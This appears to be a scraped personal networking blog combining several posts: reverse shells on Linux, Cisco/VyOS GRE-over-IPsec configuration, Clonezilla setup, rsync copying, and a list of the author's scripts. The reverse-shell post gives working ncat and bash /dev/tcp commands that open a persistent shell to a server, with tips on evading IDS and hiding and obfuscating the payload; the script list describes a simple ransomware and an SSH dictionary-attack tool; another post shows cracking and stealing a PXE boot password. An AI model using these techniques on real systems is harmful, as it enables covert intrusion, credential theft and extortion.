brezular

My name is Radovan Brezula and you are reading my personal blog. By way of introduction, let me tell you few words about me and my blog. I work as a professional soldier of the Slovak Armed Forces. I've been a Linux enthusiast since 2005. That time I fell in love with Fedora Linux. My relationship with my beloved Fedora was broken in 2013 when I started using Linux Debian.

I started with my blog in September 2010, at that time as a side project of my studies for Cisco certification. As the days went by, I added tutorials about emulation of various network devices from different vendors using GNS3. In case that you are looking for articles about running devices such as Cisco CSR 1000v, Quagga, VyOS, Open vSwitch, Atista, Alcatel-Lucent and others on Linux, the blog is the right place to start reading. You will also find here information about installation of machine emulators and virtualizers such as Qemu, KVM, VirtualBox, VMware Workstation on Debian and Fedora Linux.

If you wish to get in touch with me, here is my Google+ profile and Google+ page. You can also reach me via Facebook  or send me an email to chicany@gmail.com. If you think it is reasonable to send me an encrypt message, here is my public GPG key.

Reverese Shell on Linux

Reverse shell is technique when a client connects to a server and the client provides its shell to the server. Clients is typically a host hidden behind the NAT or a firewall having an access to the server but not vice versa. Thanks to a reverse shell the server controls a client's shell having an access to the client's network even the client is hidden behind the NAT. They are several methods how to create a reverse shell used depending on software available on the client. I will show how to create a reverse shell using SSH, Ncat and Bash.

picture1-network_topology

Picture 1 - Network Topology

Picture 1 shows our testing topology. The client (Ubuntu Server 16.04) is located behind the NAT with the IP address 192.168.1.4/24. The server (Kubuntu 16.04) has assigned the IP address 172.17.100.7/16.

1. Reverse Shell Using SSH Reverse Tunnel

This method is based on the fact that the client has knowledge of the server SSH login credentials and vice versa. SSH server must be running on both the server and client. Client must be allowed to access server through firewall.

Client:
$ ssh -R 10000:127.0.0.1:22 brezular@172.17.100.7

10000 - remote port opend on the server
22 - clients's local port
brezular@172.17.100.7 - username and IP address of the server

Server:
First, check if port 10000 is open on server.

picture2-port_open_on_server

Picture 2 - TCP Port 10000 Opened on Server

Now we connect from the server to the client with the command:

$ ssh -p 10000 root@127.0.0.1

2. Reverse shell with Ncat using SSL encryption

In order to prevent IDS to inspect a content of network traffic we will use a version of Ncat that supports SSL. The netcat version provided by a Nmap package supports both SSL and IPv6.

$ ncat --version
Ncat: Version 7.01 ( https://nmap.org/ncat )

First, we will configure server to listen on all IP addresses and TCP port 10000.

Server:
$ ncat -l -k -v --ssl -p 10000

By default a TCP protocol is used. Only TCP Ncat mode supports SSL.
-l listen
-k accept multiple connections in listen mode
-v verbose mode
--ssl connect with SSL
-p port

Client:
$ ncat -e /bin/bash --ssl 172.17.100.7 10000

-e executes /bin/bash

Ncat is working great but in many cases it is not installed on the client. To provide a correct version of Ncat I have created a script runncat.sh that contains converted Ncat binary from the Nmap package to base64 and hexa strings that are stored in particular variables. The script extracts ncat to a file /tmp/.binary. Then it checks if there is an established session with the server 172.17.100.7. If no, it tries to connects to the server 172.17.100.7,  TCP port 10000. If connection is successful, session between client and server is established and script waits. If no connection is established, the script keeps to connect the server every 20 seconds.

3. Reverse Shell with Bash

Scripting languages can be used to create a reverse shell. I will show a reverse shell using Bash that is very common in Linux. Again, we start the Ncat on the server to listen on a port 10000.

$ ncat -l -k -v --ssl -p 10000

Client:
$ while true; do (/bin/bash -i > /dev/tcp/172.17.100.7/10000 0>&1 2>&1) > /dev/null 2>&1; [ "$?" == 1 ] && sleep 20; done

To hide our activity in the system we will slightly change a script written by Danielle Bellavista which obfuscates our Bash reverse shell command. The script obfuscator.sh creates a file payload in a actual directory. Then we just copy a file payload to the client, assign execute privileges to the file and run it on the client.

 

 

Bash Script for Converting Video To MP3 Audio

I like listening to video training on my smartphone while walking to work. To save the space on the memory card I convert videos to MP3 audio in advance. For this purpose I wrote a Bash script video_to_mp3.sh which helps me to manage a conversion job. The script uses ffmpeg for conversion and it creates parallel conversion tasks to speed up the conversion process. The script checks the CPU load and it creates a new background process only if the CPU load is under a particular limit entered by a user.

picture2_script_usage

Picture 1 - Script Usage

Below is the output from the conversion process.

picture1_script_usage

Picture 2 - Output From Conversion Process

The script creates a log file displaying info about the result of all conversion tasks. If the conversion fails for a particular video file, the script displays a return value of ffmpeg utility and the name of the file which is not successfully converted.

picture2_log_file_format

Picture 2 - Output from Log File

End.

 

GRE over IPSec Tunnel and NAT Between Cisco and VyOS

The goal of this tutorial is to provide a configuration for Cisco and VyOS network devices with configured PAT (Port Address Translation) that connect two remote sides A and B through point-to-point GRE tunnel encapsulated into a IPsec tunnel. In a previous tutorial we proved that GRE tunnels in conjunction with IPsec tunnels transmit multicast traffic while data integrity, authentication and confidentiality was in place. I also provided a simple configuration of GRE, IPsec tunnel and OSPF routing protocol on the Cisco and VyOS routers. In this tutorial I will go further and provide full configuration of  the all network devices including PAT and access-lists.  picture1_network_infrastructure

Picture 1 - Network Topology

Topology Description - Side A

Each side has a Layer 2 Cisco switch located in a LAN network. A switch connects hosts to its switchports. Each switchport is assigned to a particular VLAN. For instance, a host PC1 is connected to the switch SW1 and the switchport is assigned to a VLAN 100. Hosts in VLAN 100 (subnet 192.168.1.0/24) have guaranteed access to a remote subnet 192.168.2.0/24 via GRE/IPsec tunnel. A NAT access-list configured on a router R1 ensures that IP address of the host in VLAN 100 is not translated by PAT when a destination address is inside a range 192.168.2.0/24. However, if a destination address is not in a range 192.168.2.0/24, the PAT translates IP addresses of the hosts in VLAN 100 to a public IP address 1.1.1.10. For instance it happens when a user logged on the host  PC1 tries to connect to the router R3 located in the Internet.

Hosts assigned to VLAN 100 have blocked access to a VLAN 300 (192.168.3.0/24) because the VLAN 300 is reserved for guests. For this reason hosts assigned to the VLAN 300 have their access limited only to the Internet. The hosts assigned to the VLAN 100 have no access to the subnet 192.168.4.0/24 configured on a remote VyOS router. The reason is that the subnet 192.168.4.0/24 is hidden behind NAT  thus it is not reachable from the Internet.

Topology Description - Side B

The side A shares the similar connectivity principles with a side B. Hosts assigned to the VLAN 200 (192.168.2.0/24) can reach the hosts in a remote subnet 192.168.1.0/24 via GRE/IPsec tunnel. They can also reach the public addresses in the Internet. However in this case, their IP addresses from the subnet 192.168.2.0/24 are translated to a public IP address 2.2.2.10 by PAT. The VLAN 400 is where guests are connected. The hosts assigned to this VLAN have access only to the Internet and their IP addresses 192.168.4.0/24 are translated to an IP address 2.2.2.10. A detailed connectivity table for sides A and B is shown below.

chart1_connectivity_scheme

Tab 1 - Connectivity Between Subnets

1. Internet Configuration

1.1 Router R3 Configuration

The following commands configured on a router R3 make the router to act as our simulated Internet which connects two remote sides A and B.

2. Side A Configuration

2.1 Layer2 Switch SW1 Configuration

Configure an interface Gi0/0 as a trunk port with allowed VLANs 100 and 300. Configure appropriate VLANs on access interfaces Gi0/1 and Gi0/2 and set interfaces as access ports. The actual commands are here.

2.2 Hosts PC1 and PC3 Configuration

All hosts located in infrastructure are based on Core Linux which requires additional configuration in order to keep IP settings after restart. To make configuration easier for you I have created a BASH script assign_ip.sh that configures an IP address, subnet mask and default gateway for a particular host. Just copy and paste the script to the vim editor on each PC and run the script as a user root with the command:

$ sudo bash ./assign_ip.sh pcnumber

Replace a word pcnumber with a number:

PC1
$ sudo bash ./assign_ip.sh 1

PC3
$ sudo bash ./assign_ip.sh 3

2.3 Router R1 Configuration

2.3.1 Router R1 on the Stick and Default Route

This configuration provides routing between VLANs 100 and 300 and it creates a static default route to the Internet.

2.3.2 R1 - NAT

Here we configure sub-interfaces GigabitEthernet 1/.0.100 and 1/0.300 as the NAT inside interfaces and the interface GigabitEthernet 0/0 as the NAT outside interface. The PAT configuration consists of creating a named access-list PAT that permits a translation of a subnet 192.168.3.0/24 to any subnet and it denies a translation of the subnet 192.168.1.0/24 to the subnet 192.168.2.0/24. The subnet 192.168.1.0/24 will be translated to the public address 1.1.1.10 only if traffic is not destined for a remote IPsec subnet 192.168.2.0/24. The PAT access-list is applied on the interface GigabitEthernet 0/0.

2.3.3 R1 - ISAKMP - Phase 1

First we create isakmp policy and select encryption, the hash algorithm, type of authentication, Diffie-Hellman group and lifetime. Then we configure key the shared key and peer address.

2.3.4 R1 - IPSec - Phase 2

In phase two we are going to create  IPSec ipsec transform set MyTS and configure encryption and the hash algorithm. This is also a place where we define IPSec mode - either a tunnel (default) or transport mode. In the tunnel mode a completely new IP delivery header is inserted in each IPSec packet while in a transport mode IP header stays untouched (except of the changed protocol type - 50 for ESP). Continue with creating a new IPsec profile named Protect-GRE. Assign transform-set MyTS is to the profile Protect-GRE and configure the lifetime. And finally assign IPSec profile to the interface tun0.

2.3.5 R1 - GRE Tunnel

GRE tunnel configuration is here.

2.3.6 R1 - OSPF Routing Protocol

OSPF routing protocol is configured here. In order to prevent sending OSPF hello multicast messages to a LAN network we configure interfaces GigabitEthernet 1/0.100 and  1/0.300 as passive interfaces.

2.3.7 R1 - Access Lists

First we create an extended named access-list incoming_traffic_g0/0. The rule 10 permits UDP packets from source IP 2.2.2.10 to a destination IP address 1.1.1.10, the destination UDP port 500. This is a port that ISAKMP protocol uses. The rule 20 permits ESP packets from the IP address 2.2.2.10 to the IP address 1.1.1.10. The rules 10 and 20 are required by IPSec tunnel. The rule 30 permits icmp echo-reply traffic from any subnet to the IP address 1.1.1.10. We need this rule to allow our hosts behind NAT to ping hosts in the Internet. The rule 40 permits established TCP traffic from any host to the IP address 1.1.1.10.  This rule is needed in order to pass incoming established TCP traffic previously sent by our hosts behind NAT to the Internet. The rule 1000 blocks any other traffic. Finally, we will apply the access-list on the interface GigabitEthernet 0/0 in an incoming direction.

The extended access-list outgoing_traffic_tun0 permits outgoing traffic from the subnet 192.168.1.0/24 to the subnet 192.168.2.0/24 and it blocks any other traffic. The access-list is applied on the interface tun0. It ensures that only traffic from the subnet 192.168.1.0/24 destined for the subnet 192.168.2.0/24 is encapsulated into the GRE tunnel.

To prevent sending packets with private addresses 192.168.1.0/24 to the Internet when the IPsec tunnel fails, we need to create the access-list outgoing_traffic_gi0/0. The rule 10 ensures that any packets with source address from the subnet 192.168.1.0/24 leave the router R1. The access-list is configured in an outgoing direction on the interface GigabitEthernet0/0. The rule 1000 permits any other traffic.

The extended named access-list incoming_traffic_gi1/0.300 applied on the interface GigabitEthernet 1/0.300 for incoming packets prevents hosts on the subnet 192.168.3.0/24 to reach the hosts inside the subnet 192.168.1.0/24.

The extended named access-list incoming_traffic_gi1/0.100 applied on the interface GigabitEthernet 1/0.100 for incoming packets prevents hosts on the subnet 192.168.1.0/24 to to reach the hosts inside the subnet 192.168.3.0/24.

3. Side B Configuration

3.1 Layer 2 SW2 Configuration

The following commands configure a trunk port, access ports and VLANs on L2 switch SW2.

3.2 Hosts PC2 and PC4 Configuration

PC1
$ sudo bash ./assign_ip.sh 2

PC3
$ sudo bash ./assign_ip.sh 4

3.3 Router VyOS Configuration

3.3.1 Router VyOS on Stick and Default Static Route

First, we configure an IP address 2.2.2.10/24 on the interface eth0 and the particular IP addresses on the sub-interfaces eth1.200 and eth1.400. Then we create a default static route with the IP address 2.2.2.2 as a next hop.  The actual configuration is here.

3.3.2 VyOS - NAT

We will create a source NAT with the rule 5 that excludes translation of the packets sent from the IP subnet 192.168.2.0/24 to the subnet 192.168.1.0/24. The rule 10 translates the source IP addresses of packets from the subnet 192.168.4.0/24 to a public IP address 2.2.2.10. The IP address 2.2.2.10 is configured on the outbound interface eth0. The rule 15 translates IP addresses of hosts from the subnet 192.168.2.0/24 to the IP address 2.2.2.10 when they sent traffic to the Internet. NAT configuration is here.

3.3.3 VyOS IPSec Tunnel

Enable IPSec on interface eth0.

3.3.4 R1 IKE Group - Phase 1

Create the ike-group named cisco and  configure encryption, the hash algorithm, DH group and lifetime.

3.3.5 VyOS - ESP Group - Phase 2

Create the esp-group named cisco and configure encryption, the hash algorithm and lifetime. Configure tunnel peer and pre-shared key. Associate ike group cisco and esp group cisco with the peer 1.1.1.10. Configure a local address used for connection. And finally, configure GRE protocol that is going to be encapsulated inside IPSec tunnel.

3.3.6 VyOS - GRE Tunnel

Create a new route policy change_mss that changes TCP MSS (Maximum Segment Size) to 1360 bytes. Then we can create GRE tunnel.

3.3.7 OSPF Configuration

Here is OSPF routing protocol configuration on VyOS.

3.3.7 VyOS - Firewall Configuration

The firewall incoming_traffic consists of the rules 1, 5 and 10 with a configured default action drop. The rule 1 allows incoming established and related traffic generated by the hosts assigned to VLAN 200 and 400. The rule 5 accepts incoming packets from the IP address 1.1.1.10 to the IP address 2.2.2.10 and to the destination port UDP 500. This is the port a ISAKMP protocol uses. The rule 10 accepts incoming packets with esp protocol from the IP address 1.1.1.10 to the IP address 2.2.2.10. The firewall name incoming_traffic is applied on the interface eth0 for incoming traffic passing the firewall and traffic destined for firewall itself (keyword local).

The firewall outgoing_traffic_tun0 inspects outgoing traffic from the interface tun0. The rule 10 allows outgoing traffic  from the subnet 192.168.2.0/24 to the subnet 192.168.1.0/24. All other traffic is dropped.

The firewall outgoing_traffic_eth0 with the rule 10 applied on the interface eth0 in the outgoing direction prevents packets with source addresses 192.168.2.0/24 destined for the subnet 192.168.1.0/24 to leak to the Internet when the VPN tunnel fails.

The firewall incoming_traffic_eth1_400 with the rule 10 applied on the sub-interface eth1.400 in the incoming direction blocks traffic with source IP address from the subnet 192.168.4.0/24 to the subnet 192.168.2.0/24. Similarly, the firewall incoming_traffic_eth1_200 with the rule 10 applied on the sub-interface eth1.200 in the incoming direction blocks traffic with source IP address from the subnet 192.168.2.0/24 to the subnet 192.168.4.0/24.

End.

 

 

 

Scripts

This article contains a list of scripts that I created and that are somehow useful for me. You are free to download and modify them according to your needs. I do not take any responsibility for improper use or any damage caused by using them.

1. Networking & Servers

1.1 Automatic Deployment VyOS ISO on VMware VM
A Bash script deploy vyos.sh downloads the latest VyOS ISO image and an Expect script install vyos.exp installs VyOS ISO on VMware vmdk disk.

1.2 Automatic Deployment of DRBL (Clonezilla) Server
The script deploy drbl.sh  installs and configure DRBL server on Ubuntu with a single Ethernet card. You have to provide the name of Ethernet interface as an argument. The script creates a virtual interface for you based on a physical interface. It also downloads a DRBL project public key, download and install drbl package from repository.

1.3 Secure Copy with Rsync from SSH server
The script copy.sh keeps copying files with rsync command while a return value of the rsync command is not zero. Just edit script and set server IP address and bothe remote and local directory.

1.4 Collecting MAC and IP addresses of Hosts Connected to Cisco Switches
The script getmac.sh collects info about ports, MAC address and IP address of hosts connected to Cisco switches. It uses SNMP protocol to do this task so switches must contain a valid SNMP configuration.

1.5 Cloning Remote Linux Machines
The script backup images.sh automates a process of cloning disks of remote Linux machines. The script reads IP addresses from a file and uses credentials you provide as command-line arguments for SSH connection.

1.6 Public Key Authentication on Cisco IOS
The Bash script addkey.sh and the Expect script addkey.tcl deploy your pub key on remote Cisco routers. The Bash script loops over IP addresses of your routers stored in a text file and send IP address as an argument to the Expect script together with login credentials. The Expect script establishes connection to a router using SSH and it adds a hash of your pub key into to a configuration file of toyr router. It also creates a new privilege user with privilege level 15.

2. Multimedia

2.1 Extracting MP3 from YouYube Videos with Youtube-dl
I am extremely bad in remembering correct syntax of commands so I wrote a Bash script convert video.sh based on the script youtube-dl which converts my favorite youtube videos to mp3 format. The script takes a YouTube link as an argument.

2.2 Convert CD Audio to MP3
The Bash script cda to mp3.sh converts CD audio to MP3.

2.3 Convert Video to MP3
The Bash script video to mp3.sh converts video to MP3.

3. Security & Hacking

3.1 Hacking Clonezilla SE PXE Boot Client Password
The script get plain pass.sh mounts a remote NFS directory on DRBL server and extracts a plain text password. The script takes an IP address of DRBL/Clonezilla server as an argument.

3.2 Simple Ransomware
The script ls.sh uses openssl to encrypt doc docx txt xls and some other files with aes256 encryption algorithms and send an encryption key to a particular email address.

3.3 Dictionary Attack Against SSH Server
The script getsshpass.sh performs a dictionary attack against SSH server. It reads usernames and passwords from dictionaries (one file for a username and one file for a password) and uses them to login to SSH server. The script also supports interrupted guessing.

3.4 Change MAC Address Randomly
The script change_mac.sh changes MAC address for chosen interface in a given time interval.

 

Hacking DRBL Client PXE Boot Password

In a previous tutorial I showed installation of Clonezilla Server Edition on Ubuntu using my own Bash script. We configured PXE (Pre eXecution Environment)) password for clients so when the clients booted a password had to be entered to startup. This tutorial explains two different ways how to get and crack the PXE boot password.

picture1_pxe_drbl-_client_password_required

Picture 1 - Client Requires to Enter PXE Password During Startup

First, we should mention some facts. The PXE client password is stored in plain text in a configuration file /etc/drbl/drblpush.conf. The password is secretpassword and it can be found in a dictionary rockyout.txt.

picture2_pxe_boot_plaintext_password

Picture 2 - Plain Text PXE Client Boot Password

The same PXE client password is stored as a hash in a file /tftpboot/nbi_img/prelinux.cfg/default.

picture3_pxe_boot_password_hash

Picture 3 - PXE Client Boot SHA-1 Base64 Encoded Salted Hash

The hash is created by utility /usr/sbin/sha1pass on DRBL server. It is a Perl script which takes two arguments from STDIN - a password and salt and it creates SHA-1 base64 salted hash.

picture4_generating_password_hash

Picture 4 - Perl Script fo Generating Hash from Password and Salt

Explanation:

  • $4$ - SHA-1 base64 encoded salted hash
  • 2mNryVVj - salt
  • WIWlkNc6cA9+eQqcf9xU0d5IvVQ - hash

They are several methods how to obtain PXE boot password. The first method is based on downloading a file /tftpboot/nbi_img/prelinux.cfg/default which contains a hash from TFTP server and cracking the hash with a tool such as john or hashcat. This method is not very practical so use it only if you want to practice your hacking skills. Moreover if a dictionary does not contain a password, your attempt very likely end up without success. The second method is fast and reliable and relies on mounting remote shared NFS directory which contains a file with a plain-text password PXE boot password.

1. Cracking Hash

Let's say we have Linux with installed DRBL server with TFTP and DHCP server running on IP address 192.168.112.200/24. A client obtains its IP address 192.168.122.8/24 from DHCP server together together with info about a boot file pxelinux.0. The client downloads the file pxelinux.0 from a TFTP server from a root directory/tftpboot/nbi_img/. Client also downloads files ldlinux.c32pxelinux.cfg/default from TFTP server. As we have mentioned before, the file /tftpboot/nbi_img/prelinux.cfg/default contains the hashed password. The hash is shown on the picture 5. Captured pcap traffic between DRBL server 192.168.112.200 and client 192.168.112.8 can be downloaded here.

picture5_captured_packet_with_hash

Picture 5 - Captured SHA-1 Base64 Encoded Salted Password Hash

I have created a BASH script get_sha1.sh that downloads a file/tftpboot/nbi_img/prelinux.cfg/default from TFTP server and extracts SHA-1 base64 salted hash from the file together with the salt. It also converts the hash from SHA-1 base64 encoded format to SHA-1 hexa encoded format and put it to format recognized by hashcat  - sha1($salt.$pass):

5885a590d73a700f7e790a9c7fdc54d1de48bd54:2mNryVVj

picture6_script_for_extarcting_hash

Picture 6 - Script for Converting Between Salted SHA-1 Base64 and SHA-1 Hexa Hashes

1.1 Hashcat Instllation and Cracking

$ wget https://hashcat.net/files_legacy/hashcat-2.00.7z
$ mkdir hashcat &&  mv hashcat-2.00.7z hashcat && cd hashcat/
$ 7z e hashcat-2.00.7z

Download dictionary:
$ wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

Let's say we have our hash stored in a file hash_decoded.txt.

./hashcat-cli64.bin -m 120 hash_decoded.txt rockyou.txt

picture7_extracting_hash

Picture 7 - Cracking SHA-1 Salted Hash with Hascat

 2. Getting Plain Text Password

In fact, we do not need to download and crack a salted SHA-1 base64 encoded password hash. We can mount a shared remote NFS directory on DRBL server to a local directory and extract a plain text password stored in a file drblpush.conf.

picture8_plain_text_password

Picture 8 - Plain Text PXE Boot Password Stored in  Drblpush.conf for Client 192.168.112.8

I have written a Bash script get_plain_pass.sh which mounts a remote NFS directory and extract a plain text password. The script takes  an IP address of DRBL/Clonezilla server as an argument.

picture9_script_usage

Picture 9 - Getting Plain Text PXE Boot Password Using NFS Share

End.

 

Clonezilla Server Edition Installation on Ubuntu

clonezilla-logo

The tutorial describes installation steps for Clonezilla Server Edition (SE) on Ubuntu 16.04.1 LTS using a Bash script. Clonezilla is OpenSource Cloning System (OCS) and it is a partition and disk imaging/cloning program . It helps you to do system deployment, bare metal backup and recovery. Two types of Clonezilla are available, Clonezilla live and Clonezilla SE (server edition).

Clonezilla live is suitable for single machine backup and restore. Clonezilla SE is for massive deployment because it can clone many computers simultaneously. Clonezilla saves and restores only used blocks in the hard disk. It decreases time and saves the hard disk space and increases the clone efficiency.

Clonezilla is a part of DRBL (Diskless Remote Boot in Linux) which provides a diskless environment for client machines. Therefore we need to install and configure DRBL server first. I created DRBL deployment script deploy_drbl.sh that helps you to install DRBL and configure server on Ubuntu with a single Ethernet card. You have to provide only the name of Ethernet interface and the script creates virtual interface for you based on your physical interface. It also downloads a DRBL project public key, download and install drbl package from repository. The script starts interactive Bash and Perl scripts that come with drbl package.  It starts them in this order:

  • drblsrv  - prepares files for PXE client and generates PXE menu
  • drblpush - configures DNS, clients' hostname, Ethernet card, collects MAC addresses of clients, configures and starts DHCP server, diskless services and Clonezilla mode, PXE password, grephical/text boot menu, NAT services for clients and firewall rules
  • dcs - DRBL utility to switch the mode for clients

Here is a version of packages installed with DRBL.

Deploying DRBL Server

1. Starting Script
The script deploy_drbl.sh must be started with root privileges. Once you login to root account with sudo su command, assign execute privileges to the script.

$ sudo su
# chmod +x ./deploy_drbl.sh
# ./deploy_drbl.sh

Now enter the name of Ethernet interface which is connected to the Internet, e.g. eth0. The script creates a new virtual interface adding suffix 100 to the name of your Ethernet interface e.g. eth0:100. It also configures IP address 192.168.112.200/24 on your virtual interface. If you want to configure different suffix or IP address/mask on the virtual interface, just change a value of variables ipaddress, mask and suffix in the script. The script installs a package drbl from repository drbl testing.

Note: The script deploy_drbl.sh requires a working connection to the Internet in order to install DRBL server. The script sets only an IP address and a mask on the virtual  interface. It is your job to configure a correct IP address/mask on the physical interface. You also need to configure default route and add DNS server.  Here are my network settings /etc/network/interfaces.

2. DRBL Server Installation
The scripts deploy_drbl.sh automatically starts a script drblsrv with a parameter -i . The script drbl is responsible for installation of DRBL server.  Installation is interactive so you must provide answers for questions - either y or n. If the letter is capital, it is a default choice and you can press Enter or type particular letter to select this choice.

2.1 Installation of Network Images

picture1_network_installation_boot_images

Picture 1 - Installation of Boot Images via Network

We do not need any boot images so type N.

2.2 Serial Console Output

picture2_serial_console_output

Picture 2 - Serial Console Output on Client Computer

We do not want to use the serial console output on the client computers so type N.

2.3 Operating System Upgrade

picture3_upgrade_os

Picture 3 - Operating System Upgrade

We do not want to upgrade our OS  - Ubuntu 16.04.1 so type N.

2.4 Selection of Kernel Image

picture4_installing_kernel_image

Picture 4 - Selecting Kernel Image for Clients

Choose option 1 - Ubuntu kernel from DRBL server.

3. Configure Clonezilla
The scripts deploy_drbl.sh automatically starts a script drblpush with a parameter -i (interactive mode).

3.1 DNS Domain

picture5_dns_domain

Picture 5 - DNS Domain

Press Enter key to configure default drbl.org domain.

3.2 NISP/YP Domain

picture6_nisp-_yp_domain

Picture 6 - NISP/YP Domain

Again, press Enter key to configure default penguinzilla domain name.

3.3 Client Hostname Prefix

picture7_client_hostname

Picture 7 - Client Hostname

We want our client to keep default  hostname prefix  so press Enter.

3.4 Ethernet Port

picture8_ethernet_port

Picture 8 - Ethernet Port

In this menu we select a network interface that is connected to the Internet (not used for DRBL connection). In our case it is enp0s3 port. Press Enter to choose a default option enp0s3.

3.5 Collecting MAC Addresses of Clients

picture9_collecting_mac_adresses

Picture 9 - Collecting MAC Addresses of Clients

We do not want to assign the same IP addresses to the clients from DHCP server thus we do not need to collect MAC addresses of the clients. Type N or just press Enter.

3.6 Same IP address for Clients

picture10_same_ip_offer

Picture 10 - Same IP address for Clients

Press Enter to reject the offer to configure the same IP addresses for clients.

3.7 DHCP Server

picture11_ip_dhcp_range

Picture 11 - DHCP Server

Now we configure a DHCP server running on the interface enp0s3:100 and providing IP addresses for clients. Enter an initial IP address from the range and the number of clients in your network. Then just confirm the DHCP range with Enter key or type Y.

3.8 Diskless Linux Services

picture12_diskless_linux_services

Picture 12 - Diskless Linux Service

We do not need to provide diskless Linux service to clients so type option 2.

3.9 Clonezilla Modes

picture13_full_conezilla_mode

Picture 13 - Clonezilla Modes

Type 0 to configure full Clonezilla mode.

3.10 Directory for Storing Images

picture14_directory_for_saving_images

Picture 14 - Directory for Saving Saved Images

Press Enter to configure a default directory /home/partimg/ for storing saved images.

3.11 PXE Linux Password for Clients

picture15_pxe_password

Picture 15 - PXE Linux Password for Clients

Type y if you want to configure a password for clients. The chosen password can be changed or disabled anytime by drbl-pxelinux-passwd utility.

3.12 Graphical Background for PXE Menu

picture16_graphical_boot

Picture 16 - Graphical Background for PXE Menu

Type y if you want to boot your clients with graphical PXE Linux menu.

3.13 NAT Services for Clients

picture17_no_nat-service_for_clients

Picture 17 - NAT Services for Clients

We do not need to provide Internet to clients so type n.

3.14 Firewall Rules

picture18_firewall_rules

Picture 18 - Changing Firewall Rules

Press Enter or type y to let DRBL server to change firewall rules.

4. Start Clonezilla Server
The scripts deploy_drbl.sh automatically starts a script dcs which starts Clonezilla.

4.1 Client Selection

picture19_selecting_clients

Picture 19 - Selecting Clients

We can either select all clients or an individual client based on its IP or MAC address. Select the first option - All .

4.2 Start Clonezilla Mode

picture20_clonezilla_start

Picture 20 - Starting Clonezilla Mode

Select an option clonezilla-start to start clonezilla mode.

4.3 Beginner Mode

picture21_beginner_mode

Picture 21 - Beginner Mode

Select an option Beginner which accepts the default options.

4.4 Select-in-Client Clonezilla Mode

picture22_select_in_clients

Picture 22 - Select-in-Client Clonezilla Mode

Select an option select-in-client. This option allows you to select either to restore or save the image on client.

4.5 Clonezilla Advanced Extra Parameters

picture23_default_clonezilla

Picture 23 - Clonezilla Advanced Extra Parameters

Select an option -y1 default Clonezilla.

4.6 Shutdown Clients

picture24_power_off_clients

Picture 24 - Shutdown Clients When Cloning is Finished

Select an option -p poweroff. Clients automatically power off once cloning is finished. When dcs script finishes, you can see the following command in your terminal window.

drbl-ocs -b -l en_US.UTF-8 -y1 -p poweroff select_in_client

-b - run program in batch mode, i.e without any prompt
-l - language en-US.UTF-8
-y1 - clonezilla server as restore server
-p - shutdown client when cloning/restoring finishes
select_in_client - client chooses either to clone or restore

You can put the command inside the script /etc/init/clone.conf to start Clonezilla automatically after boot. To clone clients using multicast in order to speed up cloning process, use the following command.

drbl-ocs -b -g auto -e1 auto -e2 -x -r -j2 -sc0 -p poweroff --time-to-wait 30 -l en_US.UTF-8 startdisk multicast_restore core_linux sda

All options are explained here.

5. Troubleshooting

Here are the problems I noticed during writing the tutorial.

5.1 Client Does Not Get IP Address

Check if DHCP service is running with the command:

$ ps -ef | grep dhcpd | grep -v grep

picture25_dhcp_service_running

Picture 25 - Checking DHCP Service

If you cannot see the output above, DHCP service is not running. Check the service status with the command:

$ systemctl status isc-dhcp-server

picture26_dhcp_service_not_active

Picture 26 - DHCP Service Disabled and Not Active

We can see that DHCP service is disabled and not active. We can enable it with the command:

$ systemctl enable isc-dhcp-server

picture27_dhcp_service_enabled_but_not_active

Picture 27 - DHCP Service Enabled But Not Active

DHCP service is enabled but not active. Activate the service with the command:

$ systemctl start isc-dhcp-server

picture28_dhcp_service_enabled_and_active

Picture 28 - DHCP Service Enabled and Active

You can check DHCP messages in /var/log/syslog file.

picture29_obtaining_ip_from_dhcp

Picture 29 - Obtaining IP Address for Client

Obtaining IP address 192.168.112.1 for client with a MAC address 09:00:27:93:43:bb via the interface enp0s3.

End.

 

Using Rsync to Copy Files From SSH Server

Recently I have come through an interesting problem. I needed to download a raw copy of the HDD image located on a remote server (about 180GB) connected via 1 Mbps link. Network connection dropped frequently so the requirement was to reestablish connection automatically, without my intervention.

Definition of Terms
Server - a remote computer with an IP address 172.17.100.5/16 which contains a raw copy of the HDD image - a file /root/ubuntu.iso.
Client - a local computer that copies a raw copy of the HDD image from the server.

Below is my how-to which helped me to fulfill a task. I hope it might be useful to you.

1. Create Multiple Archive Files
The idea is to create a compressed archive file and to split it to multiple sequential chunks in order to make transfer of files less depended on network outages due to an unreliable link.

$ tar cvf - ubuntu.iso | gzip -9 - | split -b 10M -d - ./disk/ubuntu.tar.gz.

The command tar creates a tar archive from a file ubuntu.iso and send it to a standard output instead to the file. The command gzip compress everything from a standard input using the best compression ratio (parameter -9) and send it to the standard output. The command split reads from the standard input and split one large archive file to multiple 10M sequential pieces with numbered suffix (parameter -d). Chunks are saved into the directory disk.

We will put a tar command to the script pack.sh  and a secure copy command scp helps us to copy a script to a remote server into to the root directory.

$ scp -rv pack.sh root@172.17.100.5:/root

Login to the server using ssh secure shell and start the script with a command below. The command nohup ensures that script keeps running in the background  also in case SSH session is dropped.

# nohup bash ./script &

2. Generate Private and Public RSA Key and Copy Public Key to Server
First we generate  public and private keys on a client with ssh-keygen command.

$ ssh-keygen -t rsa -P ""

-t type of key to create
-P passphrase (blank).

The command generates a public key  id_rsa.pub and a private key id_rsa and saves the both keys into a directory ~/.ssh. Let's copy our public key to a remote server with the ssh-copy-id command.

$ ssh-copy-id -i ~/.ssh/id_rsa.pub root@172.17.100.5

-i path to a public key on a client

Now we should be able to connect to a remote server with ssh using a public key authentication (without entering a password).

3. Copy Files with Rsync
Rsync is a command for synchronizing and copying directories both locally and remotely. We will use it for downloading our archive chunk files. For us copying files with rsync command is a preferable copy method comparing to copying chunks with scp command. The command scp overwrites already copied files on a client when the copying is restarted (in order to download the rest of files e.g. after a network outage).

Rsync works differently. For instance when a file is only partially downloaded  during a network outage, the command rsync started with a parameter --partially ensures that a file is kept on the disk. A parameter --append ensures that rsync downloads the rest of the file after network connection is restored.

Here is a script copy.sh that we are going to run on the client. The script keeps copying files with rsync command  while a return value of the rsync command is not zero.

Rsync options:
-a append data onto shorter files
-e specify the remote shell to use (ssh)
--partial keep partially transferred files
--progress show progress during file transfer
-v verbose

4. Merge and Extract Downloaded Files
The last step consists of merging chunks located in a directory files on the client using the cat command. The output from the cat is sent to the tar command which reads data from the standard input and extracts and decompress the archive file. As a result a file ubuntu.iso is created.

$ cat ./files/ubuntu.tar.gz.* | tar zxvf -

 

Quagga Routing Software with EIGRP Support

